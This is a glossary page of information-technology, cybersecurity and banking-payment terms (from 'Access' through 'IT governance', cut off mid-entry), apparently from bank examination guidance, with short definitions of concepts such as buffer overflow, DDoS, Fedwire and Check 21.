Welcome » Glossary
A B C D E F G H I J K L M N O P Q R S T U V W X Z
AAccess - The ability to physically or logically enter or make use of an IT system or area (secured or unsecured). The process of interacting with a system.Access point - Methods of connection that include a user’s home network, cellular network, NFC, Bluetooth, or public Wi-Fi connections, such as those provided by a municipality or business.Administrator privileges - Computer system access to resources that are unavailable to most users. Administrator privileges permit execution of actions that would otherwise be restricted.Agency - A legal relationship between two parties who agree that one (the agent) is to act on behalf of another (the principal), subject to the latter’s general control. The principal generally is held liable for the agent’s actions.Agility - In IT systems, the ability to rapidly incorporate new technologies or changes to technologies allowing an organization to adapt to changing business needs.Air-gapped environment - Security measure that isolates a secure network from unsecure networks physically, electrically, and electromagnetically.Anomalous activity - The process of comparing definitions of what activity is considered normal against observed events to identify significant deviations.Antivirus/anti-malware software - A program that monitors a computer or network to identify all types of malware and prevent or contain malware incidents.Application - A software program designed for use by end users.Application "2" - Software that performs automated functions for a user. Examples include home banking, word processing and payroll. Distinguished from operating system or utility software.Application controls - Controls related to transactions and data within application systems. Application controls ensure the completeness and accuracy of the records and the validity of the entries made resulting from both programmed processing and manual data entry. Examples of application controls include data input validation, agreement of batch totals and encryption of data transmitted.Application development - The process of designing and building code to create a computer program (software) used for a particular type of job.Application security - The use of software, hardware, and procedural methods to protect applications from external threats. Application store - A type of digital distribution platform for computer software, often in a mobile context.Application system - An integrated set of computer programs designed to serve a well- defined function and having specific input, processing, and output activities (e.g., general ledger, manufacturing resource planning, human resource management).Asset - In computer security, a major application, general-support system, high-impact program, physical plant, mission-critical system, personnel, equipment, or a logically-related group of systems.ATM - Asynchronous transfer mode. The method of transmitting bits of data one after another with a start bit and a stop bit to mark the beginning and end of each data unit. Can also mean automated teller machine.Attack signature - A specific sequence of events indicative of an unauthorized access attempt.Audit charter - A document approved by the board of directors that defines the IT audit function's responsibility, authority to review records, and accountability.Audit plan - A description and schedule of audits to be performed in a certain period of time (ordinarily a year). It includes the areas to be audited, the type of work planned, the high-level objectives and scope of the work and includes other items such as budget, resource allocation, schedule dates, and type of report issued.Audit program - The audit policies, procedures, and strategies that govern the audit function, including IT audit.Authentication - The process of verifying the identity of an individual user, machine, software component, or any other entity.Availability - Whether or how often a system is available for use by its intended users. Because downtime is usually costly, availability is an integral component of security.BBandwidth - Terminology used to indicate the transmission or processing capacity of a system or of a specific location in a system (usually a network system) for information (text, images, video, sound). Bandwidth is usually defined in bits per second (bps) but also is usually described as either large or small. Where a full page of English text is about 16,000 bits, a fast modem can move approx. 15,000 bps. Full-motion, full-screen video requires about 10,000,000 bps, depending on compression.Baseline configuration - A set of specifications for a system, or configuration item (CI) within a system, that has been formally reviewed and agreed on at a given point in time and that can be changed only through change control procedures. The baseline configuration is used as a basis for future builds, releases, or changes.Benchmark - A standard, or point of reference, against which things may be compared or assessed.Biometric - The measuring and analysis of such physical attributes as facial features and voice or retinal scans. This technology can be used to define an individual's unique identity, often for security purposes.Black holing - A method typically used by ISPs to stop a DDoS attack on one of its customers. This approach to block DDoS attacks makes the site in question completely inaccessible to all traffic, both malicious attack traffic and legitimate user traffic.Border router - A device located at the organization’s boundary to an external network.BPS - Bits per second. A measurement of how fast data moves from one place to another. A 28.8 modem can move 28,800 bits per second.Buffer overflow - A condition at an interface under which more input can be placed into a buffer or data-holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially-crafted code that allows them to gain control of a system.Business continuity - The ability to maintain operations and services - both technology and business - in the event of a disruption to normal operations and services. Ensures that any impact or disruption of services is within a documented and acceptable recovery time period and that the system or operations is/are resumed at a documented and acceptable point in the processing cycle.Business resilience - The capacity to maintain functions and organizational structure in the face of an internal or external change or threat, recover from a significant disruption, and continue critical operations with minimal impact.CCapacity planning - The process used to determine whether a service, application, or process is sufficient to handle volumes at peak times and meet growth projections for a specific period of time. Analysis should consider hardware (networks, servers, routers, etc.), software (operating system and application software), and personnel.CAR - Courtesy amount recognition. The numeric amount of a check.Cash Letter - A group of checks accompanied by a paper listing sent to a clearinghouse, a Federal Reserve Bank, or another institution. A cash letter contains a number of negotiable items, mostly checks, accompanied by a letter that lists the amounts and instructions for transmittal to another bank. May also be called a transmittal letter.
An incoming cash letter is one that is received by an institution from a clearinghouse, a Federal Reserve Bank, or another institution and contains checks written on accounts at the institution that were cashed elsewhere.
An outgoing cash letter is one that is being sent to a clearinghouse, a Federal Reserve Bank, or another institution and contains checks deposited at the institution, which are written on accounts at other institutions.Change management - The broad processes for managing organizational change. Change management encompasses planning, oversight or governance, project management, testing, and implementation.Check 21 Act - Formally known as the Check Clearing for the 21st Century Act. Creates a new document, the IRD (image replacement document or substitute check) that is the legal equivalent of the original check and should be accepted as such. The act does not require institutions to accept electronic images instead of checks or IRDs, but does require the acceptance of IRDs instead of paper checks. The exchange of electronic images is optional and will be done by agreements between individual institutions, groups of institutions, or clearinghouses.CHIPS - A private-sector U.S.-dollar funds transfer system, clearing and settling cross-border and domestic payments.Classification - Categorization (e.g., “confidential,” “sensitive,” or “public”) of the information processed by the service provider on behalf of the receiver company.Cloud computing - Generally a migration from owned resources to shared resources in which client users receive information technology services on demand from third-party service providers via the Internet “cloud.” In cloud environments, a client or customer relocates its resources — such as data, applications, and services — to computing facilities outside the corporate firewall, which the end user then accesses via the Internet.Clustering - Connecting two or more computers together in such a way that enables them to act as a single computer. Clustering is used for parallel processing, load balancing, and fault tolerance.Code analysis - Use of tools to analyze source code and/or compiled version of code in order to help find security flaws.Computer security - Technological and managerial procedures applied to computer systems to ensure the availability, integrity, and confidentiality of information managed by the computer system.Confidentiality - Assuring information will be kept secret, with access limited to appropriate persons.Configuration management - The management of security features and assurances through control of changes made to a system’s hardware, software, firmware, documentation, testing, test fixtures, and test documentation throughout the development and operational life of the system.Contingency plan - A plan for emergency response, backup operations, and post-disaster recovery maintained by an institution as a part of its security program. The plan ensures the availability of critical resources and facilitates the continuity of operations in an emergency situation.Control requirements - Process used to document and/or track internal processes to determine that those established procedures and/or physical security policies are being followed.Control self-assessment - A technique used to internally assess the effectiveness of risk management and control processes.Conversion plan - A plan that details transition planning and implementation issues in the period between the execution of an outsourcing agreement and the full production use of the outsourced services.Corrective control - A mitigating technique designed to lessen the impact to the institution when adverse events occur.COTS - Commercial off-the-shelf. COTS products include software and hardware products that are ready-made and available for sale to the general public. COTS products are typically installed in existing systems and do not require customization. Also known as “shrink-wrap” applications.Crisis management - The process of managing an institution’s operations in response to an emergency or event that threatens business continuity. An institution’s ability to communicate with employees, customers, and the media, using various communications devices and methods, is a key component of crisis management.Critical system (infrastructure) - The systems and assets, whether physical or virtual, that are so vital that the incapacity or destruction of such may have a debilitating impact.Cross-site scripting - A type of computer security vulnerability typically found in web applications that enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting (XSS) vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Anti-XSS features help protect applications from cross-site scripting attacks.Custom redirect service - This service enables control over the location of incoming calls or the redirection of calls to various locations or pre-established phone numbers to ensure customer service continuity.Cyber attack - An attempt to damage, disrupt, or gain unauthorized access to a computer, computer system, or electronic communications network. An attack, via cyberspace, targeting an institution for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.Cyber event - A cybersecurity change or occurrence that may have an impact on organizational operations (including mission, capabilities, or reputation).Cyber incident - Actions taken through the use of computer networks that result in an actual or potentially-adverse effect on an information system or the information residing therein.Cyber resilience - The ability of a system or domain to withstand cyber attacks or failures and, in such events, to reestablish itself quickly.Cyber threat - An internal or external circumstance, event, action, occurrence, or person with the potential to exploit technology-based vulnerabilities and to adversely impact (create adverse consequences for) organizational operations, organizational assets (including information and information systems), individuals, other organizations, or society.Cybersecurity - The process of protecting consumer and bank information by preventing, detecting, and responding to attacks.DDASD - Data center - A facility that houses an institution’s most important information systems components, including computer systems, telecommunications components, and storage systems. Data classification program - A program that categorizes data to convey required safeguards for information confidentiality, integrity, and availability; establishes controls required based on value and level of sensitivity. Data corruption - Errors in computer data that occur during writing, reading, storage, transmission, or processing, which introduce unintended changes to the original data. Data integrity - The property that data has not been destroyed or corrupted in an unauthorized manner; Maintaining and assuring the accuracy and consistency of data over its entire life-cycle.Data loss prevention (DLP) - A comprehensive approach (covering people, processes, and systems) of implementing policies and controls designed specifically to discover, monitor, and protect confidential data wherever it is stored, used, or in transit over the network and at the perimeter.Data mining - The process or techniques used to analyze large sets of existing information to discover previously unrevealed patterns or correlations.Data mirroring - A back-up process that involves writing the same data to two physical disks or servers simultaneously.Data replication - The process of copying data, usually with the objective of maintaining identical sets of data in separate locations. Two common data replication processes used for information systems are synchronous and asynchronous mirroring. Data security - The process of safeguarding important information from unauthorized access, corruption, or loss.Data synchronization - The comparison and reconciliation of interdependent data files at the same time so that they contain the same information.Data transmission security - The transfer of confidential or proprietary information over a secure channel.Database - A collection of data that is stored on any type of computer storage medium and may be used for more than one purpose.Daylight overdraft - A daylight overdraft occurs at any point in the business day when the balance in an institution’s account becomes negative. Daylight overdrafts can occur in accounts at Federal Reserve Banks as well as at private financial institutions. Daylight credit can also arise in the form of net debit positions of participants in private payment systems. A daylight overdraft occurs at a Federal Reserve Bank when there are insufficient funds in an institution’s Federal Reserve Bank account to cover outgoing funds transfers or incoming book-entry securities transfers. An overdraft can also be the result of other payment activity processed by the Federal Reserve Bank, such as check or automated clearinghouse transactions. Debit card - A payment card issued as either a PIN-based debit (ATM) card or as a signature-based debit card from one of the bankcard associations. A payment card issued to a person for purchasing goods and services through an electronic transfer of funds from a demand deposit account rather than using cash, checks, or drafts at the point-of-sale. Debit entry - An entry to the record of an account to represent the transfer or removal of funds from the account.Dedicated Synchronous Optical NETwork (SONET) - SONET is a standard for telecommunications transmissions over fiber optic cables. SONET is self-healing so that if a break occurs in the lines, it can use a back-up redundant ring to ensure that the transmission continues. SONET networks can transmit voice and data over optical networks.Deep packet inspection - The capability to analyze network traffic to compare vendor-developed profiles of benign protocol activity against observed events to identify deviations.Defense-in-depth - Information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.Deferred net settlement - See "National Settlement Service".Deliverable - A project goal or expectation. Deliverables include broadly-defined, project or phase requirements and specifically-defined tasks within project phases.Depository - An institution that holds funds or marketable securities for safekeeping. Depositories may be privately or publicly operated and allow securities transfers through book-entry and offer funds accounts permitting funds transfers as a means of payment.Depository bank - The institution at which a check is first deposited. While this term is often used interchangeably with “depository,” “depositary” is a term of art in laws and regulations related to check processing. Depository bank (Check 21) - Also known as Bank of First Deposit (BOFD). The first bank to which a check is transferred even though it is also the paying bank or the payee. A check deposited in an account is deemed to be transferred to the financial institution holding the account into which the check is deposited, even though the check is physically received and endorsed first by another financial institution. Detective control - A mitigating technique designed to recognize an event and alert management when events occur.Device fingerprinting - Information collected about a remote computing device for the purpose of identification.Dictionary attack - Discovery of authenticators by encrypting likely authenticators and comparing the actual encrypted authenticator with the newly encrypted possible authenticators.Digital certificate - The electronic equivalent of an ID card that authenticates the originator of a digital signature.Digital subscriber line (DSL) - DSL provides the ability to transmit high-speed digital signals over existing telephone lines.Direct access storage device (DASD) - A magnetic disk storage device historically used in mainframe environments. DASD may also include hard drives used in personal computers. Direct data feed - A process used by information aggregators to gather information directly from a website operator rather than copying it from a displayed webpage.Direct debit - Electronic transfer, usually through ACH, out of an individual's checking (or savings) account to pay bills, such as mortgage payments, insurance premiums, and utility payments. Also referred to as “direct payment.” Direct deposit - Electronic deposits or credit, usually through ACH, to an individual’s deposit account. Common uses of direct deposit include payroll payments, Social Security benefits, and income from investments such as CDs, annuities, and mutual funds.Direct presentment - Depositary banks can present checks directly to the paying institution. The paying institution may be the depositary bank (no settlement is needed), or, if not, may settle on the books of the Federal Reserve, using the Federal Reserve’s national settlement service.Disaster recovery - The process of recovering from major processing interruptions. Disaster recovery exercise - A test of an institution’s disaster recovery or BCP. Disaster recovery plan - A plan that describes the process to recover from major processing interruptions.Disk shadowing - A back-up process that involves writing images to two physical disks or servers simultaneously.Distributed denial of service (DDoS) - A type of attack that makes a computer resource or resources unavailable to its intended users. Although the means to carry out, motives for, and targets of a DDoS attack may vary, it generally consists of the concerted efforts of a group that intends to affect an institution’s reputation by preventing an Internet site, service, or application from functioning efficiently.Distributed environment - A computer system with data and program components physically distributed across more than one computer.Diversity - A description of financial services sectors in which primary and back-up telecommunications capabilities do not share a single point of failure.DMZ - Abbreviation for “demilitarized zone.” A computer or small subnetwork that sits between a trusted internal network, such as a corporate private LAN, and an untrusted external network, such as the public Internet.DNS Server - Abbreviation for “Domain Name Service server.” A computer that determines Internet Protocol (IP) numeric addresses from domain names presented in a convenient, readable form.Domain Name System security extensions (DNSSEC) - A technology that was developed to, among other things, protect against such attacks by digitally ‘signing’ data so you can be assured it is valid.DSL - Digital subscriber line. A technology that uses existing copper telephone lines and advanced modulation schemes to provide high-speed telecommunications to businesses and homes. Dual control - Dividing the responsibility of a task into separate, accountable actions to ensure the integrity of the process.Due diligence - Technical, functional, and financial review to verify a third-party service provider’s ability to deliver the requirements specified in its proposal. The intent is to verify that the service provider has a well-developed plan and adequate resources and experience to ensure acceptable service, controls, systems backup, availability, and continuity of service to its clients.EE-Banking - The remote delivery of new and traditional banking products and services through electronic delivery channels.Electronic Benefits Transfer (EBT) - A type of EFT system involving the transfer of public entitlement payments, such as welfare or food stamps, through direct deposit or point-of-sale technology (see POS). The recipient can be given an identification card, similar to a benefit card, and a PIN allowing access to the benefits through an electronic network.Electronic bill presentment and payment (EBPP) - An electronic alternative to traditional bill payment, allowing a merchant or utility to present its customers with an electronic bill and the payer to pay the bill electronically. EBPP systems usually fall within two models: direct and consolidation-aggregation. In the direct model, the merchant or utility generates an electronic version of the consumer’s billing information, and notifies the consumer of a pending bill, generally via e-mail. The consumer can initiate payment of the electronically presented bill using a variety of payment mechanisms, typically a credit card. In the consolidation-aggregation model, the consumer’s bills are consolidated by a consolidator acting on behalf of merchants and utilities (or aggregated on behalf of the consumer), combining data from multiple bills and presenting a single source for the consumer to initiate payment. Some consolidators present bills at their own web sites, typically most support the aggregation of bills by consumer service providers such an Internet portals, financial institutions, and brokerage web sites. Electronic check conversion - The process by which a check is used as a source of information for the check number, the customer’s account number, and the number that identifies the financial institution. The information is used to make a one-time electronic payment from the customer’s account -- an electronic fund transfer. The check itself is not the method of payment.Electronic check presentment (ECP) - Check truncation methodology in which the paper check’s MICR line information is captured and stored electronically for presentment. The physical checks may or may not be presented after the electronic files are delivered, depending on the type of ECP service that is used.Electronic commerce (E-Commerce) - A broad term encompassing the remote procurement and payment by businesses or consumers of goods and services through electronic systems such as the Internet.Electronic data capture (EDC) - Process used for capturing and transferring the encoded information on the magnetic strip from a bankcard or debit card at the point-of-sale to the processor’s database.Electronic funds transfer (EFT) - A generic term describing any transfer of funds between parties or depository institutions through electronic data systems.Electronic Funds Transfer Act (EFTA) - The Electronic Funds Transfer Act and Regulation E are designed to ensure adequate disclosure of basic terms, costs, and rights relating to electronic fund transfer (EFT) services provided to consumers. Institutions offering EFT services must disclose to consumers certain information, including: initial and updated EFT terms, transaction information, periodic statements of activity, the consumer’s potential liability for unauthorized transfers, and error resolution rights and procedures. EFT services include automated teller machines, telephone bill payment, point-of-sale transfers in retail stores, fund transfers initiated through the Internet, and pre-authorized transfers to or from a consumer’s account.Electronic vaulting - A back-up procedure that copies changed files and transmits them to an off-site location using a batch process.Electronically-created payment orders - These are payment orders received by merchants from consumers, typically by telephone or the Internet. These payment orders are processed through the check processing system although they were not initiated as paper checks. These payment orders are not subject to check law and are not warranted by the Federal Reserve Banks. E-mail server - A computer that manages e-mail traffic.Emergency plan - The steps to be followed during and immediately after an emergency such as a fire, tornado, bomb threat, etc.Encryption - A data security technique used to protect information from unauthorized inspection or alteration. Information is encoded so that data appears as a meaningless string of letters and symbols during delivery or transmission. Upon receipt, the information is decoded using an encryption key.End user - An individual who will utilize a product or program.End-of-life - All software products have life cycles. End-of-life refers to the date when a software development company no longer provides automatic fixes, updates, or online technical assistance for the product.Endpoint security - Security controls that validate the security compliance of the client system that is attempting to use the Secure Sockets Layer (SSL) virtual private networks (VPN). Endpoint security controls also include security protection mechanisms, such as Web browser cache cleaners, that remove sensitive information from client systems.End-to-end process flow - Document that details the flow of the processes, considering automated and manual control points, hardware, databases, network protocols, and real-time versus periodic processing characteristics.End-to-end recoverability - The ability of an institution to recover a business process from initiation, such as customer contact, through process finalization, such as transaction closure. Enterprise architecture - The overall design and high-level plan that describes an institution’s operational framework and includes the institution’s mission, stakeholders, business and customers, work flow and processes, data processing, access, security, and availability.Enterprise network - The configuration of computer systems within an organization. Includes local area networks (LANs), wide area networks (WANs), bridges, applications, etc.Enterprise-wide - Across an entire organization, rather than a single business department or function. Expedited Funds Availability Act (EFAA) - See "Regulation CC".Exploit - A technique or code that uses a vulnerability to provide system access to the attacker. An exploit is an intentional attack to impact an operating system or application program.Exposure - The potential loss to an area due to the occurrence of an adverse event.Exposure limit - In reference to the settlement of operating services, this is the maximum amount an ACH originator is allowed to originate. This amount can be based on the originator’s credit rating, historical or predicted funding requirements, and the type of obligation.External Connections - An information system or component of an information system that is outside of the authorization boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness.FFederal Reserve Banks - The Federal Reserve Banks provide a variety of financial services including retail and wholesale payments. The Federal Reserve Bank operates a nationwide system for clearing and settling checks drawn on depository institutions located in all regions of the United States.Fedwire® - The Federal Reserve Bank’s nationwide real time gross settlement electronic funds and securities transfer network. Fedwire® is a credit transfer system. Each funds transfer is settled individually against an institution’s reserve or clearing account on the books of the Federal Reserve. The transaction is considered an irrevocable payment as it is processed.Fedwire® Funds Service - The Federal Reserve Banks’ high-speed electronic funds transfer system. As a real-time gross settlement system, the Fedwire® Funds Service processes and settles individual payments between participants immediately in central bank money. Once processed, these payments are final.Fedwire® Securities Service - The Federal Reserve Banks’ high-speed electronic payments system for maintaining securities accounts and for effecting securities transfers. The Fedwire® Securities Service provides a real-time, delivery-versus-payment (DVP), gross settlement system that allows for the immediate, simultaneous transfer of securities against payment. Once processed, securities transfers are final.FEMA - FEMA is an acronym for Federal Emergency Management Agency.Fibre channel - A high performance serial link supporting its own, as well as higher-level protocols such as the small computer system interface, high performance parallel interface framing protocol and intelligent peripheral interface. The Fibre Channel standard addresses the need for very fast transfers of large amounts of information. The fast (up to 1 Giga byte per second) technology can be converted for LAN technology by adding a switch specified in the Fibre Channel standard that handles multipoint addressing. Fibre Channel gives users one port that supports both channel and network interfaces, unburdening the computers from large number of input and output (I/O) ports. Fibre Channel provides control and complete error checking over the link. FIN (Financial Application) - The SWIFT application within which all SWIFT user-to-user messages are input and output.Finality - Irrevocable and unconditional transfer of payment during settlement.Financial Authority - A supervisory organization that is responsible for safeguarding and maintaining consumer confidence in the financial system.Financial EDI (FEDI) - Financial electronic data interchange. An instrument for settling invoices by initiating payments, processing remittance data and automating reconciliation, through the exchange of electronic messages.Financial industry participants - Financial institutions and other companies that are involved in the banking, securities, and/or insurance industry and are regulated by supervisory authorities.Financial Services Information Sharing and Analysis Center (FS-ISAC) - A nonprofit, information-sharing forum established by financial services industry participants to facilitate the public and private sectors’ sharing of physical and cybersecurity threat and vulnerability information.Firewall - A hardware or software link in a network that relays only data packets clearly intended and authorized to reach the other side. Firmware - A software program or set of instructions programmed on a hardware device.Float - Funds held by an institution during the check-clearing process before being made available to a depositor. Interest may be earned on these funds. Flowcharts - Traditional flowcharts involve the use of geometric symbols, such as diamonds, ovals, and rectangles to represent the sequencing of program logic. Software packages are available that automatically chart programs or enable a programmer to chart a program without the need to draw it manually.Frame relay - A high-performance WAN protocol that operates at the physical and data link layers of the Open Systems Interconnect (OSI) reference model. Frame Relay is an example of a packet-switched technology. Packet-switched networks enable end stations to dynamically share the network medium and the available bandwidth. Frame relay uses existing T-1 and T-3 lines and provides connection speeds from 56 Kbps to T-1.Framing - A frame is an area of a webpage that scrolls independently of the rest of the webpage. Framing generally refers to the use of a standard frame containing information (like company name and navigation bars) that remains on the screen while the user moves around the text in another frame.FTP (file transfer protocol) - A standard high-level protocol for transferring files from one computer to another, usually implemented as an application level program.Full duplex - A communications channel that carries data in both directions.Full-interruption/full-scale test (IT and Staff) - A business continuity test that activates all the components of the disaster recovery plan at the same time. Hardware, software, staff, communications, utilities, and alternate site processing should be thoroughly tested in this type of testing activity. The exercise should include the business line end users and the IT group to ensure that each business line tests its key applications and is prepared to recover and resume its business operations in the event of an emergency. The full test verifies that systems and staff can recover and resume business within established recovery time objectives. End users should verify the integrity of the data at the alternate site after the IT group has restored systems and applications needed for the staff to perform production activities.Functional drill/parallel test - This test involves the actual mobilization of personnel at other sites in an attempt to establish communications and coordination as set forth in the BCP.Functional requirements - The business, operational, and security features an organization wants included in a program.Functionality testing - A test designed to validate that a business process or activity accomplishes expected results.GGap analysis - A comparison that identifies the difference between actual and desired outcomes.Gateway server - A computer (server) that connects a private network to the private network of a servicer or other business. General controls - Controls, other than application controls, that relate to the environment within which application systems are developed, maintained, and operated, and that are therefore applicable to all the applications at an institution. The objectives of general controls are to ensure the proper development and implementation of systems, and the integrity of program and data files and of computer operations. Like application controls, general controls may be either manual or programmed. Examples of general controls include the development and implementation of an IT strategy and an IT security policy, the organization of IT staff to separate conflicting duties and planning for disaster prevention and recovery.Geolocation - The identification of the real-world geographic location of an object, such as a radar source, mobile phone or Internet-connected computer terminal.GETS - Acronym for the Government Emergency Telecommunications Service card program. GETS cards provide emergency access and priority processing for voice communications services in emergency situations. Governance - In computer security, governance means setting clear expectations for the conduct (behaviors and actions) of the entity being governed and directing, controlling, and strongly influencing the entity to achieve these expectations. Governance includes specifying a framework for decision making, with assigned decision rights and accountability, intended to consistently produce desired behaviors and actions.Gramm-Leach-Bliley Act (GLBA) - The GLBA, also known as the Financial Services Modernization Act of 1999, (Pub.L. 106-102, 113 Stat. 1338, enacted November 12, 1999), required the Federal banking agencies to establish information security standards for financial institutions. Grandfather-father-son - Retaining multiple versions of the back-up files off-site on a “grandfather-father-son” rotating basis is recommended. This tape methodology creates three sets of back-up tapes: daily incremental sets or “sons,” weekly full sets or “fathers,” and end-of-month tapes or “grandfathers.” HHacker - An individual who attempts to break into a computer without authorization.Haircut - With respect of an eligible currency, the percentage increase of a negative currency balance or reduction of a positive currency balance and is based on (a) the volatility of the historic foreign exchange movements in the applicable eligible currency determined by CLS Bank and (b) an add-on component.Hardening - The process of securing a computer’s administrative functions or inactivating those features not needed for the computer’s intended business purpose. Hardware - The physical elements of a computer system; the computer equipment as opposed to the programs or information stored in a machine.Hash - A fixed length cryptographic output of variables, such as a message, being operated on by a formula or cryptographic algorithm.Hash Totals - A numerical summation of one or more corresponding fields of a file that would not ordinarily be summed. Typically used to detect when changes in electronic information have occurred.HBA - Host bus adapter. A host bus adapter provides I/O processing and physical connectivity between a server and storage. As the only part of a storage area network that resides in a server, HBAs also provide a critical link between the storage area network and the operating system and application software. Hierarchical storage management (HSM) - HSM is used to dynamically manage the back-up and retrieval of files based on how often they are accessed using storage media and devices that vary in speed and cost.Hijacking - The use of an authenticated user’s communication session to communicate with system components.Hop - Each step of a trip a data packet takes from its origination to its destination. For example, on the Internet a data packet may go through several routers before reaching its final destination. HOP (1) - Each step of a trip a data packet takes from its origination to its destination. For example, on the Internet a data packet may go through several routers before reaching its final destination.Host - A computer that is accessed by a user from a remote location.Hosting - See "Website Hosting".HTML - Abbreviation for “Hypertext Markup Language.” A set of codes that can be inserted into text files to indicate special typefaces, inserted images, and links to other hypertext documents.Hub - Simple devices that pass all data traffic in both directions between the LAN sections they link. Hubs forward every message they receive to the other sections of the LAN, even those that do not need to go there. HVAC - Heating, ventilation, and air conditioning.Hyperlink - An item on a webpage that, when selected, transfers the user directly to another location in a hypertext document or to another webpage, perhaps on a different machine. Also simply called a “link.”Hypervisor - A piece of software that provides abstraction of all physical resources (such as central processing units, memory, network, and storage) and thus enables multiple computing stacks (consisting of an operating system, middleware and application programs) called virtual machines to be run on a single physical host.II/O - Input/output.IDS - Intrusion Detection System.Image archive (Check 21) - Database for storage and easy retrieval of check images.Image capture (Check 21) - The process of digitizing both sides of physical items and their assorted MICR information as they are processed at the Federal Reserve Bank. Also includes storage of the images for up to 60 days.Image exchange (Check 21) - Exchange of some or all of the digitized images of a check.Implementation plan - A plan that details project management requirements and issues to be addressed during the period between the execution of an outsourcing agreement and the full production use of the outsourced services.Incident management - The process of identifying, analyzing, and correcting disruptions to operations and preventing future recurrences. The goal of incident management is to limit the disruption and restore operations as quickly as possible.Incident response plan - A plan that defines the action steps, involved resources, and communication strategy upon identification of a threat or potential threat event, such as a breach in security protocol, power or telecommunications outage, severe weather, or workplace violence.Indemnifying bank (Check 21) - A financial institution that transfers, presents, or returns a substitute check or a paper or electronic representation of a substitute check for which it receives consideration. The financial institution shall indemnify the recipient and any subsequent recipient (including a collecting or returning financial institution, the depository financial institution, the drawer, the drawee, the payee, the depositor, and any endorser) for any loss incurred by any recipient of a substitute check if that loss occurred due to the receipt of a substitute check instead of the original. Independence - Self-governance, freedom from conflict of interest and undue influence. The IT auditor should be free to make his or her own decisions, not influenced by the organization being audited, or by its managers and employees. Industry testing - A test designed to validate that business processes, integrated across firms and within the financial industry, which supports the business continuity objectives of the firms, both individually and collectively.Information security - The process by which an organization protects the creation, collection, storage, use, transmission, and disposal of information.Information systems - Electronic systems and physical components used to access, store, transmit, protect, and eventually dispose of information. Information systems can include networks (computer systems, connections to business partners and the Internet, and the interconnections between internal and external systems). Other examples are backup tapes, mobile devices, and other media.Information technology - Any services or equipment, or interconnected system(s) or subsystem(s) of equipment that comprise the institution’s IT architecture or infrastructure. It can include computers, ancillary equipment (including imaging peripherals, input, output, and storage devices necessary for security and surveillance), peripheral equipment designed to be controlled by the central processing unit of a computer, software, firmware and similar procedures, services (including cloud computing and help-desk services or other professional services which support any point of the life cycle of the equipment or service), and related resources.Infrastructure - Describes what has been implemented by IT architecture and often include support facilities such as power, cooling, ventilation, server and data redundancy and resilience, and telecommunications lines. Specific architecture types may exist for the following: enterprise, data (information), technology, security, and application.Instruction - Means (i) any instruction submitted by a Member through the submission process directing CLS Bank to settle certain payment entitlements and obligations arising pursuant to an FX transaction eligible for settlement in CLS Bank and (ii) any instructions resulting from the split of Settlement Eligible Instructions.Integrated services digital network (ISDN) - Integrated test/exercise - This integrated test/exercise incorporates more than one component or module, as well as external dependencies, to test the effectiveness of the continuity plans for a business line or major function. Integrity - Assurance that information is trustworthy and accurate; Ensuring that information will not be accidentally or maliciously altered or destroyed (see “Data Integrity”).Interbank checks - Checks that are not “on-us.” They are cleared and settled either by direct presentment, a clearinghouse association, a correspondent bank, or a Federal Reserve Bank.Interchange - Exchange of transactions between financial institutions participating in a bank card network, based on a common set of rules. Card interchange allows a financial institution’s customers to use a bank credit card at any card honoring merchant and to gain access to multiple ATM systems from a single ATM.Interchange (fees) - Fees paid by one financial institution to another to cover handling costs and credit risk in a financial institution card transaction. Interchange fees generally flow toward the institution funding the transaction and assuming the risk. In a credit card transaction, the interchange fee is paid by the merchant acquirer accepting the merchant’s sales draft to the card-issuing institution, which, in turn, passes the fee to its merchants. In EFT/POS transactions, interchange flows in the opposite direction: the card-issuing institution (or customer) pays the fee to the terminal-owning institution. When a transaction is an off-line debit sale, the card-issuing institution collects an interchange fee from the merchant, rather than from the customer, unlike in an EFT/POS transaction, where the customer pays the interchange fee. Interchange revenue is derived from fees set by the card associations. Depending on the card association, fees can range from 1% to 3% of the value of the transaction. Interchange revenue is recognized as a card issuer’s second largest revenue line item. Interconnectivity - The state or quality of being connected together. The interaction of a financial institution’s internal and external systems and applications and the entities with which they are linked.Interdependencies - Where two or more departments, processes, functions, and/or third-party providers support one another in some fashion. Interface - Computer programs that translate information from one system or application into a format required for use by another system or application.Internet - A worldwide network of computer networks, governed by standards and protocols developed by the Internet Engineering Task Force (IETF).Internet protocol (IP) - IP is a standard format for routing data packets between computers. IP is efficient, flexible, routable, and widely used with many applications, and is gaining acceptance as the preferred communication protocol. Internet service provider (ISP) - A company that provides its customers with access to the Internet (e.g., AT&T, Verizon, CenturyLink).Interoperability - The ability of a system to work with or use the parts or equipment of another system.Interoperability standards/protocols - Commonly agreed on standards that enable different computers or programs to share information. Example: HTTP (Hypertext Transfer Protocol) is a standard method of publishing information as hypertext in HTML format on the Internet.Intrusion detection - Techniques that attempt to detect unauthorized entry or access into a computer or network by observation of actions, security logs, or audit data; detection of break-ins or attempts, either manually or via software expert systems that operate on logs or other information available on the network. Intrusion detection system (IDS) - Software/hardware that detects and logs inappropriate, incorrect, or anomalous activity. IDS are typically characterized based on the source of the data they monitor: host or network. A host-based IDS uses system log files and other electronic audit data to identify suspicious activity. A network-based IDS uses a sensor to monitor packets on the network to which it is attached.Intrusion prevention systems (IPS) - A system that can detect an intrusive activity and can also attempt to stop the activity, ideally before it reaches its target.IPv6 - Version 6 of the Internet Protocol.ISAC - Information Sharing and Analysis Center.iSCSI - Internet small computer system interface. An Internet protocol based storage networking standard for linking data storage facilities, used to facilitate. iSCSI is data transfers over intranets and to manage storage over long distances.ISDN - Integrated systems digital networking. A hierarchy of digital switching and transmission systems that provides voice, data, and image in a unified manner. ISDN is synchronized so that all digital elements communicate in the same protocol at the same speed.ISDN (1) - Integrated systems digital networking. A hierarchy of digital switching and transmission systems that provides voice, data, and image in a unified manner. ISDN is synchronized so that all digital elements communicate in the same protocol at the same speed.ISO - International Organization for Standards.IT architecture - A subset of enterprise architecture, with detail to support data processing and access, including fundamental requirements for centralized or distributed computing, real or virtual servers, devices and workstations, and networking design. Architecture plans may also exist for data (information), security, and applications.IT governance - An integral part of governance that consists of the leadership and organizational structures and processes that ensure that the institution’s IT sustains and extends the organization’s strategies and objectives. IT strategic plan - A comprehensive blueprint that guides 